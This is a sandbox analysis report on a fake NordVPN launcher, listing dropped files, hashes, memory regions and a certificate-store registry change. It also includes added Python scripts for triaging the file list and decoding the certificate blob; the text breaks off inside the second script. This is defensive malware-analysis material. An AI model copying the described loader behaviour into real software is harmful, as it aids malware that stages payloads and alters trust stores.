SHA512 e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3

memory/2392-4392-0x00000000737A0000-0x0000000073F50000-memory.dmp

memory/2392-4393-0x0000000004A20000-0x0000000004A30000-memory.dmp

memory/2392-4394-0x0000000004910000-0x0000000004946000-memory.dmp

memory/2392-4395-0x0000000005060000-0x0000000005688000-memory.dmp

memory/2392-4396-0x0000000005030000-0x0000000005052000-memory.dmp

memory/2392-4397-0x0000000005800000-0x0000000005866000-memory.dmp

memory/2392-4398-0x0000000005870000-0x00000000058D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fpww0w0r.3rh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2392-4408-0x00000000058E0000-0x0000000005C34000-memory.dmp

memory/2392-4409-0x0000000005F80000-0x0000000005F9E000-memory.dmp

memory/2392-4410-0x0000000005FC0000-0x000000000600C000-memory.dmp

memory/2392-4411-0x0000000004A20000-0x0000000004A30000-memory.dmp

memory/2392-4412-0x0000000006F60000-0x0000000006FF6000-memory.dmp

memory/2392-4413-0x00000000064B0000-0x00000000064CA000-memory.dmp

memory/2392-4414-0x0000000006500000-0x0000000006522000-memory.dmp

memory/2392-4415-0x0000000007600000-0x0000000007BA4000-memory.dmp

memory/4808-4420-0x00000000737A0000-0x0000000073F50000-memory.dmp

memory/4808-4421-0x0000000002F60000-0x0000000002F70000-memory.dmp

memory/4808-4422-0x0000000002F60000-0x0000000002F70000-memory.dmp

memory/4808-4434-0x0000000002F60000-0x0000000002F70000-memory.dmp

memory/2392-4435-0x00000000737A0000-0x0000000073F50000-memory.dmp

memory/4808-4437-0x00000000700E0000-0x000000007012C000-memory.dmp

memory/4808-4436-0x0000000007940000-0x0000000007972000-memory.dmp

memory/4808-4447-0x0000000006CE0000-0x0000000006CFE000-memory.dmp

memory/4808-4448-0x0000000007980000-0x0000000007A23000-memory.dmp

memory/4808-4449-0x00000000080F0000-0x000000000876A000-memory.dmp

memory/4808-4450-0x0000000007B20000-0x0000000007B2A000-memory.dmp

memory/4808-4451-0x0000000007CA0000-0x0000000007CB1000-memory.dmp

memory/4808-4452-0x0000000007CE0000-0x0000000007CEE000-memory.dmp

memory/4808-4453-0x0000000007CF0000-0x0000000007D04000-memory.dmp

memory/4808-4454-0x0000000007D30000-0x0000000007D4A000-memory.dmp

memory/4808-4455-0x0000000007D20000-0x0000000007D28000-memory.dmp

memory/4808-4458-0x00000000737A0000-0x0000000073F50000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2392-4464-0x0000000004A20000-0x0000000004A30000-memory.dmp

memory/1800-4468-0x0000000000400000-0x00000000008F2000-memory.dmp

memory/2392-4472-0x0000000004A20000-0x0000000004A30000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\01plugins16318.rar

MD5 e5e2d68307b34f409a92ef7669837322
SHA1 ee6cf43a96cac8e36f8b8dd06c826d428063f1d5
SHA256 d4032168bf6b6de3d4f936c03d947fe6524ced7cca91bbc2134bbf8fbc834cce
SHA512 b9ed94940194dcdddab7230db7d6ccf527e5bff4c9f822a553430f19d0f172a5d4fe1052a69ca19afd394f52ee9953a0f61afaf3447bd927b3b94114e505b2c5

C:\Users\Admin\AppData\Roaming\services\plugin16904

MD5 c233a13f928f3d16c08b4ce9231dd11e
SHA1 01f011955763cd6b25d8c2b463c42d2339807737
SHA256 bceda9a1bbaa1b5e4353c64f7a95fc00e757872cbfc67f2ee1aa2f501c7a0ae0
SHA512 6e6192e46b3089e7fa3d320a5457a023cf210f4a2fb41378f9a9c84aacd7c1f5f7efdbfc6b322a7f2e7916b9a18961cd320fd49f24a9ac1448ae56cd426e5ba5

C:\Users\Admin\AppData\Roaming\services\.wget-hsts

MD5 249e2716b9617321571ec649761b6c55
SHA1 9aa9ce93d585744b92c3a66f70b84cd0965ac2cb
SHA256 d0ba8b6245274e17cd9fabb2d9eb654d9a9db39a7c494c8eb3339e03fde9b988
SHA512 ea2d7f3fd57d14039a1c1ebb824a870efd8e765e13f126ee742e0a73a3bde832ab6f6e36a41d77f381a33a86af4e16c14e4be12abf259592bdc8e2bfa3731b10

memory/3700-4484-0x0000000000820000-0x0000000000920000-memory.dmp

memory/3700-4485-0x00000000021D0000-0x000000000222A000-memory.dmp

memory/3700-4486-0x0000000000400000-0x000000000056A000-memory.dmp

memory/3700-4487-0x0000000003400000-0x0000000003800000-memory.dmp

memory/3700-4488-0x0000000003400000-0x0000000003800000-memory.dmp

memory/3700-4489-0x0000000003400000-0x0000000003800000-memory.dmp

memory/3700-4491-0x0000000003400000-0x0000000003800000-memory.dmp

memory/3700-4490-0x00007FFF0CD30000-0x00007FFF0CF25000-memory.dmp

memory/3700-4493-0x00000000774A0000-0x00000000776B5000-memory.dmp

memory/5772-4494-0x0000000000130000-0x0000000000139000-memory.dmp

memory/5772-4496-0x0000000001E80000-0x0000000002280000-memory.dmp

memory/5772-4497-0x0000000001E80000-0x0000000002280000-memory.dmp

memory/5772-4500-0x0000000001E80000-0x0000000002280000-memory.dmp

memory/5772-4501-0x00000000774A0000-0x00000000776B5000-memory.dmp

memory/3700-4502-0x0000000000400000-0x000000000056A000-memory.dmp

memory/3700-4503-0x00000000021D0000-0x000000000222A000-memory.dmp

memory/3700-4504-0x0000000003400000-0x0000000003800000-memory.dmp

memory/5772-4498-0x00007FFF0CD30000-0x00007FFF0CF25000-memory.dmp

memory/5772-4505-0x0000000001E80000-0x0000000002280000-memory.dmp

memory/5192-4508-0x0000000000400000-0x00000000008F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

MD5 5e4bed1f03eaf955f34fb7aac08e1ea9
SHA1 25995351caff180c6054845dbb065ad15c35f502
SHA256 d24273e54ee82454ed6a49fad5c3e6ff593121ed45ebb6a88b7b36de994e67af
SHA512 e06a0b7be4941d9790455b71350fba0dc5cda3c18c61bd3d365da986a92585e42d57a0d723b6aef19c1c173208cd310b74096b77aaea8aa1590e4a33e848b9bb

C:\Users\Admin\AppData\Roaming\services\02plugins22289.rar

MD5 72aa5a9a19666e3a55e01e1d601c427e
SHA1 568a2a9d127b3c36723c5a906c0558862a64f2ae
SHA256 8ff970c1c22841e952b43f4d3cb8c1eb5e950d8d07a6f3d63d9ed02decd81492
SHA512 e5d23c418286b065f3e17af6b32eaa7140d22f7c78e9e564702a4c9bb34d7fd8480409217133c682aa0b30d59bdb4743feb0774330e5d9219276fa52af206f3e

C:\Users\Admin\AppData\Roaming\services\2plugin20718

MD5 098f0b6b6cfa12d01ee4c84aeb790a0e
SHA1 15c4be833af1c5ec6eae1cc9e860de30fb625895
SHA256 21c8a15270b17d16ed2bfb0b0522a59515c1991ccb4489cc374edb884dddc6b5
SHA512 882633c26faf013036bcaa756d2c8ff45b5826d5c9e2cf7e679ca4df25ac00b1b563e88375f05ae1f86b41becd5af9385ce345bbb12f4d3d1dc2e21e66a3a8c6

C:\Users\Admin\AppData\Roaming\services\.wget-hsts

MD5 221a8c261f9722171aee46f3cbc4c268
SHA1 02c211e3f4d547fddb1e3a375892198e485ee41d
SHA256 bf3b7fbb8af24192c830d43bf157f40c12dbe86bce239742fce9af712f6c0630
SHA512 667231be15354f00b7cee4c8f3047dab69f37e4e5ead2b7acfc3d72246f4131433cf6af5c89952933adc06699ea4d9a4b59ea8b22dfaa0a8d4afc123dfdab385

memory/1160-6895-0x00007FF648450000-0x00007FF64930F000-memory.dmp

memory/1160-6963-0x00007FFF0CF30000-0x00007FFF0CF32000-memory.dmp

memory/1160-7040-0x00007FFF0CF40000-0x00007FFF0CF42000-memory.dmp

memory/1160-7149-0x00007FF648450000-0x00007FF64930F000-memory.dmp

memory/1672-8520-0x0000000000400000-0x00000000008F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\03plugins20500.rar

MD5 e0ee8a8e48b04842a4434c1b61b7a0eb
SHA1 4d818c5553ac1a143ed779a231e097031e9861ab
SHA256 b4035a9802d9780599901c0a857ecbf9c01c0b6649ba50149c54bc020cd543be
SHA512 edf098b9eecb42d4b3747fbd84b564ae30af4d8bb6724e0ec6309d69f15173fb8008d8db05050344aadba71038ea005fed99f7658d4a337b176ffa28ca124dad

C:\Users\Admin\AppData\Roaming\services\3plugin16826

MD5 e6b9e5284ebbee453b064a4a69dc4ac8
SHA1 e7f7c669e671518cf64e8abe0ee461c016752446
SHA256 ecd35974505db0e7b6f99a14f088856acfe1ed674305d738383957e13b1b4614
SHA512 bc0b7e6bdafde1bd071705a4dc7b3af51a4c1e4c75865a76ea4ee1e319d1b116c7977f0ea1833581cc78688873c2253d5a613e2e9a10a51406c86bde4d3f535b

memory/5940-8529-0x0000000000630000-0x0000000000730000-memory.dmp

memory/5940-8530-0x0000000002240000-0x00000000022AC000-memory.dmp

memory/5940-8531-0x0000000000400000-0x0000000000562000-memory.dmp

C:\Users\Admin\Downloads\NordVPN-10_11\data\0a7TilYbj59R

MD5 8fd9587175089a28f343787c5584ba78
SHA1 4ed5968257f4da2e8745456809a775f86e03378b
SHA256 7c419ed0d315faf4e9e3c8a0060bfae24030e619dc1de2ca224e8e3f98c176c8
SHA512 e9e0b00d07eda323fc76eac1dff83cfebfaa9f7760f0b83fe82a9e7c513a54b631d2b98e2cee0ca81015136812e8e4472d1f89964eda8f9fb5e723b51e1a5383

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\KzudmJin6lXi

MD5 c92fed2e8824ebe59b2b38310ea3fe8d
SHA1 9d146f2ab0e98890a378a65c552a36590fcad271
SHA256 1702cc8523a4361f705cf02ea1bb747eec81d74a649dfac30385504ba941447b
SHA512 12364fd7996b2a8542812b546d13c861b653e7608dafc8ef9c729603d951d98fd14a3cc242a523b7e51927deca7a883f0e671fb8a7871f45306066ac2454ef85

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\M2oXKqJw7kuL

MD5 a526b31d99b1d923ffa55ae90bfce68b
SHA1 7701b458645c22ee2070aa8ed91e145c355d720c
SHA256 5b055c8fd3c52659e9f0de6edc6a03e03b1f26860542320aba89fa9c6e96db55
SHA512 331bd378fb0b5e638a9743c5232d6976b62ce680cb5d7a195db6523931ad1d63271652acab090af89b47768d68feb32d00b1c9b6d8823a0ec7fbac570a706c2c

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\n7j7W2HpDlaV

MD5 d256df0128142c2786f16867b624c3ae
SHA1 2abfaa61c522cfd683897ffd4188163454eecd96
SHA256 1fdb08358bf31fcfcd7abe16ff3dc62f44f46a5a0f76daca3254700c777ca87f
SHA512 12bdf93b02d8566b10d77b2b5c4134d74ce8df7eb2bf270c9f8cc138122f928ff05df03da8060820391ad5014f643ae3b3d71e819bbfd44a561b55edfcfc9500

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\o9pCvu9gJvgd

MD5 8e1766890ebee89d299d77795481045e
SHA1 dfdbe4314b015934f06cd79ae28a23533c52f5ef
SHA256 1b66f36687244cf205ec6b578a1d6271a973e68691b4deaa0304710f8c2993d8
SHA512 a39dc28048f8e6216a7cbdc10ce9a058c7657b4a72967956a5535573b9438172dde55084c96519fcda2f3bbe24389b755cc9f141eefd983ab2b0bb375ed6369f

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\P1pLxqSzXgRg

MD5 1355fc586770db90ea21cbe6b89fe845
SHA1 a9883ef24e93541ca9d45a970473ec5780533b71
SHA256 19814dcc1fca8141bacdb44feee963a9f5ecec810df659edf1fff8a17913e2d4
SHA512 489e58d00d5202027ae88a804e7353a3474e128c1b5b59e5a0c74beb33752973f854fcbcfa1bb089f202fb98513bf5f4c260ed4fd8dd9f53a8a056c093e0a6e9

memory/5940-9037-0x0000000000400000-0x0000000000562000-memory.dmp

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\PAD0IZ9SNxru

MD5 1ad79d8978eb39916bfcf12201a8a8d4
SHA1 47b067f53e1073dde9d1f0fed81f318e02cc8e39
SHA256 4cebcd0162c2f388827417c21e47f5e3d927f23d2c576d0e19caf0afb12adc5c
SHA512 56edf45b83e69e04714865fffe7f8dafa87a71e900344049ad8533c4b71a844ee3e51790750a1c4d73702fcf00a17fd44d11f6eae6b6dfcd67c49b3b515aeaa9

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\p0MXLhfTaaTv

MD5 c2008f9e264dff5507f28d98a7c39adb
SHA1 ea0e0832cc5d674fd865a172bd7efb059cee01a5
SHA256 c71db89c455ac2fa22f5bd633fbf626e3408a1f971d5d995297f4b000185541e
SHA512 daeace12ae8ae14db376a172888dd80b869bea80156916d0d445794ffe36df90e802de2fae7d5d5909dbfff30bea36c12f71ef5e79a4074262f76e43c649435e

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\panO8aCTk5I7

MD5 616c497096de4050a299319be120f5bc
SHA1 2a0cbda932a6c0538250164f901071e522cd7653
SHA256 2877aff346a38b1afd76787b1ecd6599ed240476b543e76af19b918a2c8a0c22
SHA512 6d4066a41c39a1f99d169ab87eeca14119897c0d65bb10d1463ee8686cc5fce56511f1e363598aa84b0c9a4378cc31907941eaa9859d9886cd2364928e64b917

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\QCL4gEKNdU1S

MD5 fcee1f14b6562ab24043771ac999f806
SHA1 7125492798f3406487ce92d8ff8950d88f28df4f
SHA256 888833093ce9e18582058d3b42934b6754e78bbe5d8ffdb9495a5e821a489bb4
SHA512 fd9aed4ccc693145ea93a5460f8fbcdd65b08a2104860ba8001c249b7378c3feae8624a9e1ab82cfd71064cec83f963c8433feb3fa1d3a4245093ac7b1382bbb

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\R9ZPoAQYj89y

MD5 10c4e5d338db97ab7b4a3bc0ca2672a8
SHA1 cbe2dc263ee124f456b2205c98d7170c92539aac
SHA256 7a03c78f8fc9a3028b7dc9df310899167a746436269e4a57c5c7169bc92298cb
SHA512 063706278090f37b1763f5b3845f666aa0cf190004ad19d4e8ae22b4a08c076f46b26dd4cababe09cd77a4fa970092ee4c067ca2cf1e20455dc29f76af9cd295

C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\RNUU6CGBfA6w

MD5 547cb043292307f7407470346e1ae2d1
SHA1 83b09087aacdfc486481ecaf3124a5c0d64f1481
SHA256 adf0004ea7a42c9724170f0c321b91a6a1bccdc0f06ae49bb6bbb8c8d54246ff
SHA512 e3cf902b9158a8ecb7e208a53a27d9bfe1e2424497922e29eac8849001376ad23dfa7457dc4d6d761cdb2f644570431e0bc4573c6239910486548627883463fb
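
Three things in the file list above are worth an automatic check rather than a visual scan: the `Launcher.dll` written under `AppData\Roaming\services\data` carries the MD5/SHA-1/SHA-256 of empty input (d41d8cd9…, da39a3ee…, e3b0c442…), so it is a zero-byte file; the lure archive ships `Launhcer.exe` next to `Launcher.exe`, a transposed-letter lookalike; and `wget.exe` and `WinRAR.exe` are bundled inside the archive rather than installed under Program Files. The script below is an added example, not part of the sandbox report; it parses entries in the report's own layout (path line followed by `ALGO digest` lines) and applies those heuristics. `SAMPLE_FILES` copies a subset of the entries above, keeping only the MD5 and SHA256 lines; the AppData and tool-name heuristics are my assumptions.

```python
"""Triage helper for a sandbox 'Files' section.

Added example, not part of the sandbox report. SAMPLE_FILES copies a subset of
the report's entries (MD5 and SHA256 lines only); the staging-directory and
tool-name heuristics are my assumptions, not the sandbox's rules.
"""
import ntpath

HASH_ALGOS = ("MD5", "SHA1", "SHA256", "SHA512")
# Digests of zero-length input: a dropped file with these hashes is empty.
EMPTY_MD5 = "d41d8cd98f00b204e9800998ecf8427e"
EMPTY_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
# Assumed: third-party tools that should not ship inside a lure archive.
KNOWN_TOOLS = {"wget.exe", "winrar.exe", "7z.exe", "7zg.exe"}

SAMPLE_FILES = r"""
C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe
MD5 93fde4e38a84c83af842f73b176ab8dc
SHA256 fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\Launhcer.exe
MD5 e5c00b0bc45281666afd14eef04252b2
SHA256 542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903

C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\wget.exe
MD5 8c04808e4ba12cb793cf661fbbf6c2a0
SHA256 a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272

C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\prefs.js
MD5 e29ab0d2aa826448bfb09679b6872a4a
SHA256 9248cf38e788be8a0f998ae84441f199fc5785127872bde784a4458df2f0d4e4
"""


def _is_hex(s):
    return bool(s) and all(c in "0123456789abcdefABCDEF" for c in s)


def parse_entries(text):
    """Turn 'path / ALGO digest' runs into [{'path': ..., 'hashes': {...}}, ...]."""
    entries, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        algo, _, digest = line.partition(" ")
        if algo in HASH_ALGOS and _is_hex(digest):
            if current is None:
                raise ValueError(f"hash line before any path: {line!r}")
            current["hashes"][algo] = digest.lower()
        else:
            current = {"path": line, "hashes": {}}
            entries.append(current)
    return entries


def is_adjacent_transposition(a, b):
    """True when a and b differ only by swapping two neighbouring characters."""
    if len(a) != len(b) or a == b:
        return False
    diff = [i for i, (x, y) in enumerate(zip(a, b)) if x != y]
    return (len(diff) == 2 and diff[1] == diff[0] + 1
            and a[diff[0]] == b[diff[1]] and a[diff[1]] == b[diff[0]])


def _stem(path):
    return ntpath.splitext(ntpath.basename(path))[0].lower()


def lookalike_pairs(text):
    """Pairs of file stems one transposition apart (launcher / launhcer)."""
    stems = sorted({_stem(e["path"]) for e in parse_entries(text)})
    return {(a, b) for i, a in enumerate(stems) for b in stems[i + 1:]
            if is_adjacent_transposition(a, b)}


def triage_files(text):
    """Return (path, reason) findings for the heuristics above."""
    entries = parse_entries(text)
    stems = sorted({_stem(e["path"]) for e in entries})
    findings = []
    for e in entries:
        path, low = e["path"], e["path"].lower()
        base = ntpath.basename(low)
        stem, ext = ntpath.splitext(base)
        h = e["hashes"]
        if h.get("SHA256") == EMPTY_SHA256 or h.get("MD5") == EMPTY_MD5:
            findings.append((path, "zero-byte file (hash of empty input)"))
        if "\\appdata\\" in low and ext in (".exe", ".dll"):
            findings.append((path, "executable dropped under AppData"))
        if base in KNOWN_TOOLS and not low.startswith("c:\\program files"):
            findings.append((path, "bundled third-party tool outside Program Files"))
        for other in stems:
            if is_adjacent_transposition(stem, other):
                findings.append((path, f"filename is a transposition of '{other}'"))
    return findings


if __name__ == "__main__":
    for path, reason in triage_files(SAMPLE_FILES):
        print(f"{reason}: {path}")
```

The transposition check is deliberately narrow (same length, one adjacent swap) so that it catches `Launhcer` without flagging every pair of short names; widen it to a full edit distance only if you also whitelist the common legitimate near-duplicates on the image. The Firefox profile entry produces no finding, which is the expected negative.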

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-29 14:54

Reported

2024-03-29 14:58

Platform

win11-20240221-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"

Signatures

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = … C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d10
23161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = … C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd4
10e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
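
The key name in the signature above is the certificate's SHA-1 thumbprint, and the `Blob` value is crypt32's serialized property list for that certificate: a sequence of records, each a little-endian u32 property id, a u32 reserved field (always 1), a u32 length and the data, with the DER certificate itself in property 32. Decoding the first records of the blob shown above gives the MD5 and SHA-1 hashes, the subject key identifier, a SHA-256 hash and the friendly name "GlobalSign Root CA - R3" (property 11, UTF-16LE). The key sits under `AuthRoot`, the store that Windows' automatic root update populates when a process first builds a chain to a public root, so on this page "Modifies system certificate store" is consistent with the sample's own TLS traffic pulling in a public root rather than with installation of an attacker-controlled one, which would normally land under `\ROOT\Certificates`. The check that settles it is whether the DER in property 32 hashes to the key name and to a fingerprint you recognise. The decoder below is an added example, not code from the sandbox or from Microsoft; `REPORT_BLOB_EXCERPT` copies the first six records of the blob above, the property-id names come from wincrypt.h, and the blobs built in `self_check` are constructed.

```python
"""Decoder for the 'Blob' value stored under a Windows certificate-store key
(\\SystemCertificates\\<store>\\Certificates\\<SHA-1 thumbprint>\\Blob).

Added example, not part of the sandbox report. Layout assumed: a sequence of
records, each a little-endian u32 property id, u32 reserved (always 1),
u32 data length, then the data. PROP_NAMES holds the CERT_*_PROP_ID values
from wincrypt.h that matter here; any other id is reported by number.
REPORT_BLOB_EXCERPT is copied from the report's Blob value (first six
records only); the blobs built in self_check() are constructed.
"""
import hashlib
import struct

PROP_NAMES = {
    3: "CERT_SHA1_HASH_PROP_ID",
    4: "CERT_MD5_HASH_PROP_ID",
    9: "CERT_ENHKEY_USAGE_PROP_ID",
    11: "CERT_FRIENDLY_NAME_PROP_ID",          # UTF-16LE, NUL-terminated
    15: "CERT_SIGNATURE_HASH_PROP_ID",
    20: "CERT_KEY_IDENTIFIER_PROP_ID",
    25: "CERT_SUBJECT_PUBLIC_KEY_MD5_HASH_PROP_ID",
    29: "CERT_SUBJECT_NAME_MD5_HASH_PROP_ID",
    32: "CERT_CERT_PROP_ID",                   # the DER-encoded certificate
    83: "CERT_ROOT_PROGRAM_CERT_POLICIES_PROP_ID",
    92: "CERT_SUBJECT_PUB_KEY_BIT_LENGTH_PROP_ID",
    98: "CERT_AUTH_ROOT_SHA256_HASH_PROP_ID",
}

KEY_THUMBPRINT = "D69B561148F01C77C54578C10926DF5B856976AD"   # the registry key name
REPORT_BLOB_EXCERPT = bytes.fromhex(
    "040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028"
    "030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad"
    "1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953"
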